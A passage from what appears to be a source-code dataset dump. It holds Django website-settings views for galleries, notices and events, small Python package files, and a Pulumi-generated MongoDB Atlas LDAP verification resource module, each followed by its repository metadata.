success_url = '/website_setting/gallery/'
success_message = 'Image has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(GalleryUpdate, self).get_context_data(**kwargs)
context['gallery'] = Gallery.objects.filter(module_holder=module_holder)
return context
class GalleryDelete(SuccessMessageMixin, DeleteView):
model = Gallery
success_message = 'Image has been deleted!'
success_url = '/website_setting/gallery/'
# Extra Gallery
class NoticeBoardCreate(SuccessMessageMixin, CreateView):
model = NoticeBoard
fields = ['heading','date','description']
template_name = 'websitesetting/notice_board.html'
success_url = '/website_setting/noticeboard/'
success_message = 'Notice Has Been Saved!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_form(self, **kwargs):
form = super(NoticeBoardCreate, self).get_form(**kwargs)
form.fields['date'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'date'}))
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(NoticeBoardCreate, self).get_context_data(**kwargs)
context['noticeboard'] = NoticeBoard.objects.filter(module_holder=module_holder)
return context
class NoticeBoardUpdate(SuccessMessageMixin, UpdateView):
model = NoticeBoard
fields = ['heading','date','description']
template_name = 'websitesetting/notice_board.html'
success_url = '/website_setting/noticeboard/'
success_message = 'Notice has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_form(self, **kwargs):
form = super(NoticeBoardUpdate, self).get_form(**kwargs)
form.fields['date'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'date'}))
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(NoticeBoardUpdate, self).get_context_data(**kwargs)
context['noticeboard'] = NoticeBoard.objects.filter(module_holder=module_holder)
return context
class NoticeBoardDelete(SuccessMessageMixin, DeleteView):
model = NoticeBoard
success_message = 'Notice has been deleted!'
success_url = '/website_setting/noticeboard/'
# Extra Cources Details
class EventsCreate(SuccessMessageMixin, CreateView):
model = Events
fields = ['name','image','heading','event_date','start_time','end_time','city','description']
template_name = 'websitesetting/events.html'
success_url = '/website_setting/events/'
success_message = 'Events Has Been Saved!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_form(self, **kwargs):
form = super(EventsCreate, self).get_form(**kwargs)
form.fields['event_date'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'date'}))
form.fields['start_time'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'time'}))
form.fields['end_time'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'time'}))
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(EventsCreate, self).get_context_data(**kwargs)
context['events'] = Events.objects.filter(module_holder=module_holder)
return context
class EventsUpdate(SuccessMessageMixin, UpdateView):
model = Events
fields = ['name','image','heading','event_date','start_time','end_time','city','description']
template_name = 'websitesetting/events.html'
success_url = '/website_setting/events/'
success_message = 'Events has been updated!'
def form_valid(self, form):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
form.instance.module_holder = module_holder
form = super().form_valid(form)
return form
def get_form(self, **kwargs):
form = super(EventsUpdate, self).get_form(**kwargs)
form.fields['event_date'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'date'}))
form.fields['start_time'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'time'}))
form.fields['end_time'] = forms.CharField(widget=forms.TextInput(attrs={'type': 'time'}))
return form
def get_context_data(self, **kwargs):
if self.request.user.is_staff:
module_holder = self.request.user.username
else:
this_holder = Teacher.objects.get(user_ptr_id=self.request.user.id)
module_holder = this_holder.module_holder
context = super(EventsUpdate, self).get_context_data(**kwargs)
context['events'] = Events.objects.filter(module_holder=module_holder)
return context
class EventsDelete(SuccessMessageMixin, DeleteView):
model = Events
success_message = 'Events has been deleted!'
success_url = '/website_setting/events/' | 41.268631 | 143 | 0.667605 | 2,651 | 23,812 | 5.78725 | 0.070539 | 0.125147 | 0.09386 | 0.035458 | 0.81039 | 0.80146 | 0.787642 | 0.772846 | 0.772846 | 0.771151 | 0 | 0.000219 | 0.232866 | 23,812 | 577 | 144 | 41.268631 | 0.839656 | 0.008063 | 0 | 0.759574 | 0 | 0 | 0.115959 | 0.049883 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087234 | false | 0 | 0.023404 | 0.002128 | 0.461702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dfe20be354714875209387b4c109e526e4ca7d48 | 46 | py | Python | lib/CloudwatchLogger/__init__.py | pentairiot/AWSCloudLogger | 63d8293cfcd72ec303f0e3b6bf693f9ebc48fe9b | [
"Apache-2.0"
] | null | null | null | lib/CloudwatchLogger/__init__.py | pentairiot/AWSCloudLogger | 63d8293cfcd72ec303f0e3b6bf693f9ebc48fe9b | [
"Apache-2.0"
] | null | null | null | lib/CloudwatchLogger/__init__.py | pentairiot/AWSCloudLogger | 63d8293cfcd72ec303f0e3b6bf693f9ebc48fe9b | [
"Apache-2.0"
] | null | null | null | from .CloudwatchLogger import CloudwatchLogger | 46 | 46 | 0.913043 | 4 | 46 | 10.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 46 | 1 | 46 | 46 | 0.976744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5f34133485ea405a0ace3c357a8df4542ce583b8 | 600 | py | Python | backend/app/lambda_handlers.py | SeanFitzpatrick0/BugKiller | c7dd328ac539aa75e8a1d908dd35722df4e78ab4 | [
"Apache-2.0"
] | null | null | null | backend/app/lambda_handlers.py | SeanFitzpatrick0/BugKiller | c7dd328ac539aa75e8a1d908dd35722df4e78ab4 | [
"Apache-2.0"
] | null | null | null | backend/app/lambda_handlers.py | SeanFitzpatrick0/BugKiller | c7dd328ac539aa75e8a1d908dd35722df4e78ab4 | [
"Apache-2.0"
] | null | null | null | from bug_killer_app.api.bug import get_bug_handler, create_bug_handler, update_bug_handler, resolve_bug_handler, \
delete_bug_handler
from bug_killer_app.api.project import get_user_projects_handler, get_project_handler, create_project_handler, \
update_project_handler, delete_project_handler
# This is needed so PyCharm will not mark these imports as unused
_ = get_user_projects_handler, get_project_handler, create_project_handler, update_project_handler, \
delete_project_handler
_ = get_bug_handler, create_bug_handler, update_bug_handler, resolve_bug_handler, delete_bug_handler
| 54.545455 | 114 | 0.856667 | 88 | 600 | 5.295455 | 0.306818 | 0.214592 | 0.055794 | 0.06867 | 0.841202 | 0.759657 | 0.759657 | 0.759657 | 0.759657 | 0.759657 | 0 | 0 | 0.1 | 600 | 10 | 115 | 60 | 0.862963 | 0.105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a0866d335aac9adf9b17e259cedb88ff64259120 | 202 | py | Python | python-lib/dku_idtb_decision_tree/tree_factory.py | dataiku/dss-plugin-decision-tree-builder | 5bc53e8331e8f2e94b5e0c52fd720ebf6ea499f1 | [
"Apache-2.0"
] | 3 | 2020-02-07T06:11:16.000Z | 2021-06-09T20:47:51.000Z | python-lib/dku_idtb_decision_tree/tree_factory.py | dataiku/dss-plugin-decision-tree-builder | 5bc53e8331e8f2e94b5e0c52fd720ebf6ea499f1 | [
"Apache-2.0"
] | 3 | 2019-12-02T20:35:59.000Z | 2020-08-07T14:51:56.000Z | python-lib/dku_idtb_decision_tree/tree_factory.py | dataiku/dss-plugin-decision-tree-builder | 5bc53e8331e8f2e94b5e0c52fd720ebf6ea499f1 | [
"Apache-2.0"
] | 3 | 2019-12-19T09:23:22.000Z | 2020-03-20T12:33:49.000Z | class TreeFactory(object):
def __init__(self):
self.trees = {}
def get_tree(self, key):
return self.trees[key]
def set_tree(self, key, tree):
self.trees[key] = tree | 22.444444 | 34 | 0.594059 | 27 | 202 | 4.222222 | 0.444444 | 0.236842 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.277228 | 202 | 9 | 35 | 22.444444 | 0.780822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.142857 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
260db16d53408c31bf7d509e1b88c96f2e79df94 | 214 | py | Python | data_loaders/__init__.py | cig-skoltech/deep_demosaick | 3ba7b86837b34b20588a0de956cdff21b711e5c2 | [
"MIT"
] | 80 | 2018-09-04T06:16:55.000Z | 2022-03-17T03:45:34.000Z | data_loaders/__init__.py | fkokkinos/deep_demosaick | 3ba7b86837b34b20588a0de956cdff21b711e5c2 | [
"MIT"
] | 6 | 2018-11-27T16:34:27.000Z | 2020-07-13T13:53:23.000Z | data_loaders/__init__.py | fkokkinos/deep_demosaick | 3ba7b86837b34b20588a0de956cdff21b711e5c2 | [
"MIT"
] | 17 | 2018-09-15T16:12:51.000Z | 2021-06-29T06:57:37.000Z | #sfrom . import utils
from .concat_dataset_loader import *
from .dataset_loader import *
from .mcm_dataset_loader import *
from .kodak_dataset_loader import *
from .rgb_transform import *
from .transform import *
| 23.777778 | 36 | 0.799065 | 29 | 214 | 5.62069 | 0.37931 | 0.306748 | 0.466258 | 0.564417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135514 | 214 | 8 | 37 | 26.75 | 0.881081 | 0.093458 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
264fb4d0060c42b29d193ce6abe47af3ff4639e3 | 32,488 | py | Python | sdk/python/pulumi_mongodbatlas/ldap_verify.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2020-04-28T19:12:30.000Z | 2022-03-22T23:04:46.000Z | sdk/python/pulumi_mongodbatlas/ldap_verify.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 59 | 2020-06-12T12:12:52.000Z | 2022-03-28T18:14:50.000Z | sdk/python/pulumi_mongodbatlas/ldap_verify.py | pulumi/pulumi-mongodbatlas | 0d5c085dcfd871b56fb4cf582620260b70caa07a | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-25T21:22:08.000Z | 2021-08-30T20:06:18.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['LdapVerifyArgs', 'LdapVerify']
@pulumi.input_type
class LdapVerifyArgs:
def __init__(__self__, *,
bind_password: pulumi.Input[str],
bind_username: pulumi.Input[str],
hostname: pulumi.Input[str],
port: pulumi.Input[int],
project_id: pulumi.Input[str],
authz_query_template: Optional[pulumi.Input[str]] = None,
ca_certificate: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a LdapVerify resource.
:param pulumi.Input[str] bind_password: The password used to authenticate the `bind_username`.
:param pulumi.Input[str] bind_username: The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
:param pulumi.Input[str] hostname: The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
:param pulumi.Input[int] port: The port to which the LDAP server listens for client connections. Default: `636`
:param pulumi.Input[str] project_id: The unique ID for the project to configure LDAP.
:param pulumi.Input[str] authz_query_template: An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
:param pulumi.Input[str] ca_certificate: CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
"""
pulumi.set(__self__, "bind_password", bind_password)
pulumi.set(__self__, "bind_username", bind_username)
pulumi.set(__self__, "hostname", hostname)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "project_id", project_id)
if authz_query_template is not None:
pulumi.set(__self__, "authz_query_template", authz_query_template)
if ca_certificate is not None:
pulumi.set(__self__, "ca_certificate", ca_certificate)
@property
@pulumi.getter(name="bindPassword")
def bind_password(self) -> pulumi.Input[str]:
"""
The password used to authenticate the `bind_username`.
"""
return pulumi.get(self, "bind_password")
@bind_password.setter
def bind_password(self, value: pulumi.Input[str]):
pulumi.set(self, "bind_password", value)
@property
@pulumi.getter(name="bindUsername")
def bind_username(self) -> pulumi.Input[str]:
"""
The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
"""
return pulumi.get(self, "bind_username")
@bind_username.setter
def bind_username(self, value: pulumi.Input[str]):
pulumi.set(self, "bind_username", value)
@property
@pulumi.getter
def hostname(self) -> pulumi.Input[str]:
"""
The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: pulumi.Input[str]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
The port to which the LDAP server listens for client connections. Default: `636`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The unique ID for the project to configure LDAP.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="authzQueryTemplate")
def authz_query_template(self) -> Optional[pulumi.Input[str]]:
"""
An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
"""
return pulumi.get(self, "authz_query_template")
@authz_query_template.setter
def authz_query_template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authz_query_template", value)
@property
@pulumi.getter(name="caCertificate")
def ca_certificate(self) -> Optional[pulumi.Input[str]]:
"""
CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
"""
return pulumi.get(self, "ca_certificate")
@ca_certificate.setter
def ca_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_certificate", value)
@pulumi.input_type
class _LdapVerifyState:
def __init__(__self__, *,
authz_query_template: Optional[pulumi.Input[str]] = None,
bind_password: Optional[pulumi.Input[str]] = None,
bind_username: Optional[pulumi.Input[str]] = None,
ca_certificate: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
links: Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyLinkArgs']]]] = None,
port: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
request_id: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
validations: Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyValidationArgs']]]] = None):
"""
Input properties used for looking up and filtering LdapVerify resources.
:param pulumi.Input[str] authz_query_template: An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
:param pulumi.Input[str] bind_password: The password used to authenticate the `bind_username`.
:param pulumi.Input[str] bind_username: The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
:param pulumi.Input[str] ca_certificate: CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
:param pulumi.Input[str] hostname: The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
:param pulumi.Input[Sequence[pulumi.Input['LdapVerifyLinkArgs']]] links: One or more links to sub-resources. The relations in the URLs are explained in the Web Linking Specification.
:param pulumi.Input[int] port: The port to which the LDAP server listens for client connections. Default: `636`
:param pulumi.Input[str] project_id: The unique ID for the project to configure LDAP.
:param pulumi.Input[str] request_id: The unique identifier for the request to verify the LDAP over TLS/SSL configuration.
:param pulumi.Input[str] status: The current status of the LDAP over TLS/SSL configuration. One of the following values: `PENDING`, `SUCCESS`, and `FAILED`.
:param pulumi.Input[Sequence[pulumi.Input['LdapVerifyValidationArgs']]] validations: Array of validation messages related to the verification of the provided LDAP over TLS/SSL configuration details. The array contains a document for each test that Atlas runs. Atlas stops running tests after the first failure. The following return values can be seen here: [Values](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
"""
if authz_query_template is not None:
pulumi.set(__self__, "authz_query_template", authz_query_template)
if bind_password is not None:
pulumi.set(__self__, "bind_password", bind_password)
if bind_username is not None:
pulumi.set(__self__, "bind_username", bind_username)
if ca_certificate is not None:
pulumi.set(__self__, "ca_certificate", ca_certificate)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if links is not None:
pulumi.set(__self__, "links", links)
if port is not None:
pulumi.set(__self__, "port", port)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if request_id is not None:
pulumi.set(__self__, "request_id", request_id)
if status is not None:
pulumi.set(__self__, "status", status)
if validations is not None:
pulumi.set(__self__, "validations", validations)
@property
@pulumi.getter(name="authzQueryTemplate")
def authz_query_template(self) -> Optional[pulumi.Input[str]]:
"""
An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
"""
return pulumi.get(self, "authz_query_template")
@authz_query_template.setter
def authz_query_template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authz_query_template", value)
@property
@pulumi.getter(name="bindPassword")
def bind_password(self) -> Optional[pulumi.Input[str]]:
"""
The password used to authenticate the `bind_username`.
"""
return pulumi.get(self, "bind_password")
@bind_password.setter
def bind_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bind_password", value)
@property
@pulumi.getter(name="bindUsername")
def bind_username(self) -> Optional[pulumi.Input[str]]:
"""
The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
"""
return pulumi.get(self, "bind_username")
@bind_username.setter
def bind_username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bind_username", value)
@property
@pulumi.getter(name="caCertificate")
def ca_certificate(self) -> Optional[pulumi.Input[str]]:
"""
CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
"""
return pulumi.get(self, "ca_certificate")
@ca_certificate.setter
def ca_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_certificate", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def links(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyLinkArgs']]]]:
"""
One or more links to sub-resources. The relations in the URLs are explained in the Web Linking Specification.
"""
return pulumi.get(self, "links")
@links.setter
def links(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyLinkArgs']]]]):
pulumi.set(self, "links", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The port to which the LDAP server listens for client connections. Default: `636`
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID for the project to configure LDAP.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="requestId")
def request_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique identifier for the request to verify the LDAP over TLS/SSL configuration.
"""
return pulumi.get(self, "request_id")
@request_id.setter
def request_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request_id", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The current status of the LDAP over TLS/SSL configuration. One of the following values: `PENDING`, `SUCCESS`, and `FAILED`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def validations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyValidationArgs']]]]:
"""
Array of validation messages related to the verification of the provided LDAP over TLS/SSL configuration details. The array contains a document for each test that Atlas runs. Atlas stops running tests after the first failure. The following return values can be seen here: [Values](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
"""
return pulumi.get(self, "validations")
@validations.setter
def validations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LdapVerifyValidationArgs']]]]):
pulumi.set(self, "validations", value)
class LdapVerify(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authz_query_template: Optional[pulumi.Input[str]] = None,
bind_password: Optional[pulumi.Input[str]] = None,
bind_username: Optional[pulumi.Input[str]] = None,
ca_certificate: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`LdapVerify` provides an LDAP Verify resource. This allows a a verification of an LDAP configuration over TLS for an Atlas project. Atlas retains only the most recent request for each project.
## Example Usage
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test_project = mongodbatlas.Project("testProject", org_id="ORG ID")
test_cluster = mongodbatlas.Cluster("testCluster",
project_id=test_project.id,
disk_size_gb=5,
provider_name="AWS",
provider_region_name="US_EAST_2",
provider_instance_size_name="M10",
cloud_backup=True)
#enable cloud provider snapshots
test_ldap_verify = mongodbatlas.LdapVerify("testLdapVerify",
project_id=test_project.id,
hostname="HOSTNAME",
port=636,
bind_username="USERNAME",
bind_password="PASSWORD",
opts=pulumi.ResourceOptions(depends_on=[test_cluster]))
```
## Import
LDAP Configuration must be imported using project ID and request ID, e.g.
```sh
$ pulumi import mongodbatlas:index/ldapVerify:LdapVerify test 5d09d6a59ccf6445652a444a-5d09d6a59ccf6445652a444a
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authz_query_template: An LDAP query template that Atlas executes to obtain the LDAP groups to which the authenticated user belongs. Used only for user authorization. Use the {USER} placeholder in the URL to substitute the authenticated username. The query is relative to the host specified with hostname. The formatting for the query must conform to RFC4515 and RFC 4516. If you do not provide a query template, Atlas attempts to use the default value: `{USER}?memberOf?base`.
:param pulumi.Input[str] bind_password: The password used to authenticate the `bind_username`.
:param pulumi.Input[str] bind_username: The user DN that Atlas uses to connect to the LDAP server. Must be the full DN, such as `CN=BindUser,CN=Users,DC=myldapserver,DC=mycompany,DC=com`.
:param pulumi.Input[str] ca_certificate: CA certificate used to verify the identify of the LDAP server. Self-signed certificates are allowed.
:param pulumi.Input[str] hostname: The hostname or IP address of the LDAP server. The server must be visible to the internet or connected to your Atlas cluster with VPC Peering.
:param pulumi.Input[int] port: The port to which the LDAP server listens for client connections. Default: `636`
:param pulumi.Input[str] project_id: The unique ID for the project to configure LDAP.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LdapVerifyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`LdapVerify` provides an LDAP Verify resource. This allows a a verification of an LDAP configuration over TLS for an Atlas project. Atlas retains only the most recent request for each project.
## Example Usage
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test_project = mongodbatlas.Project("testProject", org_id="ORG ID")
test_cluster = mongodbatlas.Cluster("testCluster",
project_id=test_project.id,
disk_size_gb=5,
provider_name="AWS",
provider_region_name="US_EAST_2",
provider_instance_size_name="M10",
cloud_backup=True)
#enable cloud provider snapshots
test_ldap_verify = mongodbatlas.LdapVerify("testLdapVerify",
project_id=test_project.id,
hostname="HOSTNAME",
port=636,
bind_username="USERNAME",
bind_password="PASSWORD",
opts=pulumi.ResourceOptions(depends_on=[test_cluster]))
```
## Import
LDAP Configuration must be imported using project ID and request ID, e.g.
```sh
$ pulumi import mongodbatlas:index/ldapVerify:LdapVerify test 5d09d6a59ccf6445652a444a-5d09d6a59ccf6445652a444a
```
For more information see[MongoDB Atlas API Reference.](https://docs.atlas.mongodb.com/reference/api/ldaps-configuration-request-verification)
:param str resource_name: The name of the resource.
:param LdapVerifyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LdapVerifyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
authz_query_template: Optional[pulumi.Input[str]] = None,
bind_password: Optional[pulumi.Input[str]] = None,
bind_username: Optional[pulumi.Input[str]] = None,
ca_certificate: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LdapVerifyArgs.__new__(LdapVerifyArgs)
__props__.__dict__["authz_query_template"] = authz_query_template
if bind_password is None and not opts.urn:
raise TypeError("Missing required property 'bind_password'")
